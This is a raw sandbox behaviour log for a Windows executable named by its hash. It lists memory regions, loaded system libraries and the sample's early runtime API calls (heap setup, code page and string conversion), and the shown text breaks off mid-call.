# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 13:58:47.253 Process: id = "1" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0x4452d000" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x77c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 110 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 111 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 112 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 113 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 114 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 115 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 116 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 117 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 118 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 119 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 120 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 121 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 122 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 123 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 124 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 125 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 265 start_va = 0x1a0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 266 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 267 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 268 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 269 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 270 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 271 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 273 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 274 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 275 start_va = 0x2540000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 276 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 280 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 281 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x380000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 283 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 284 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 285 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 286 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 287 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 288 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 289 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 290 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 291 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 292 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 293 start_va = 0x210000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 294 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 295 start_va = 0x2540000 end_va = 0x26c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 296 start_va = 0x2720000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 297 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 299 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 300 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 301 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 302 start_va = 0x2820000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 303 start_va = 0x29b0000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029b0000" filename = "" Region: id = 304 start_va = 0x3db0000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 305 start_va = 0x210000 end_va = 0x2a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 306 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 307 start_va = 0x3f90000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f90000" filename = "" Region: id = 308 start_va = 0x2b0000 end_va = 0x2b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 309 start_va = 0x2b0000 end_va = 0x2b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 310 start_va = 0x3db0000 end_va = 0x3ecafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 311 start_va = 0x3f80000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 312 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 313 start_va = 0x3f90000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 314 start_va = 0x3f90000 end_va = 0x406efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f90000" filename = "" Region: id = 315 start_va = 0x40c0000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 316 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 317 start_va = 0x2b0000 end_va = 0x2b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 318 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Thread: id = 1 os_tid = 0xe94 [0069.802] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9ed581e0, dwHighDateTime=0x1d8a8d3)) [0069.804] GetCurrentProcessId () returned 0xe90 [0069.804] GetCurrentThreadId () returned 0xe94 [0069.804] GetTickCount () returned 0x13adaab [0069.804] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2072893344212) returned 1 [0069.805] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed70)) [0069.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.805] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3f80000 [0069.806] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0069.806] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0069.807] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0069.807] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0069.807] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0069.809] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x214) returned 0x3f807d0 [0069.809] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0069.810] GetCurrentThreadId () returned 0xe94 [0069.810] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a656, hStdOutput=0x49a98f, hStdError=0x3f807d0)) [0069.810] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x800) returned 0x3f809f0 [0069.810] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0069.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0069.810] SetHandleCount (uNumber=0x20) returned 0x20 [0069.810] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0069.811] GetEnvironmentStringsW () returned 0x2731ed8* [0069.811] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x0, Size=0xb0e) returned 0x3f811f8 [0069.811] FreeEnvironmentStringsW (penv=0x2731ed8) returned 1 [0069.811] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0069.811] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x0, Size=0xc8) returned 0x3f81d10 [0069.811] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x98) returned 0x3f81de0 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x3e) returned 0x3f81e80 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x56) returned 0x3f81ec8 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x6e) returned 0x3f81f28 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x78) returned 0x3f81fa0 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x62) returned 0x3f82020 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x30) returned 0x3f82090 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x48) returned 0x3f820c8 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x28) returned 0x3f82118 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x1a) returned 0x3f82148 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x34) returned 0x3f82170 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x5c) returned 0x3f821b0 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x32) returned 0x3f82218 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x2e) returned 0x3f82258 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x1c) returned 0x3f82290 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x12a) returned 0x3f822b8 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x7c) returned 0x3f823f0 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x36) returned 0x3f82478 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x3a) returned 0x3f824b8 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x90) returned 0x3f82500 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x24) returned 0x3f82598 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x30) returned 0x3f825c8 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x36) returned 0x3f82600 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x48) returned 0x3f82640 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x52) returned 0x3f82690 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x3c) returned 0x3f826f0 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0xd6) returned 0x3f82738 [0069.812] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x2e) returned 0x3f82818 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x1e) returned 0x3f82850 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x2c) returned 0x3f82878 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x54) returned 0x3f828b0 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x52) returned 0x3f82910 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x2c) returned 0x3f82970 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x26) returned 0x3f829a8 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x3e) returned 0x3f829d8 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x24) returned 0x3f82a20 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x30) returned 0x3f82a50 [0069.813] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x8c) returned 0x3f82a88 [0069.828] HeapFree (in: hHeap=0x3f80000, dwFlags=0x0, lpMem=0x3f811f8 | out: hHeap=0x3f80000) returned 1 [0069.832] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0069.832] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x80) returned 0x3f82b20 [0069.832] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x8, Size=0x800) returned 0x3f811f8 [0069.832] GetLastError () returned 0x0 [0069.832] SetLastError (dwErrCode=0x0) [0069.832] GetLastError () returned 0x0 [0069.832] SetLastError (dwErrCode=0x0) [0069.833] GetLastError () returned 0x0 [0069.833] SetLastError (dwErrCode=0x0) [0069.833] GetACP () returned 0x4e4 [0069.833] RtlAllocateHeap (HeapHandle=0x3f80000, Flags=0x0, Size=0x220) returned 0x3f81a00 [0069.833] GetLastError () returned 0x0 [0069.833] SetLastError (dwErrCode=0x0) [0069.833] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.833] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0069.833] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0069.833] GetLastError () returned 0x0 [0069.833] SetLastError (dwErrCode=0x0) [0069.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.834] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0069.834] GetLastError () returned 0x0 [0069.834] SetLastError (dwErrCode=0x0) [0069.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ") returned 256 [0069.834] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.834] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 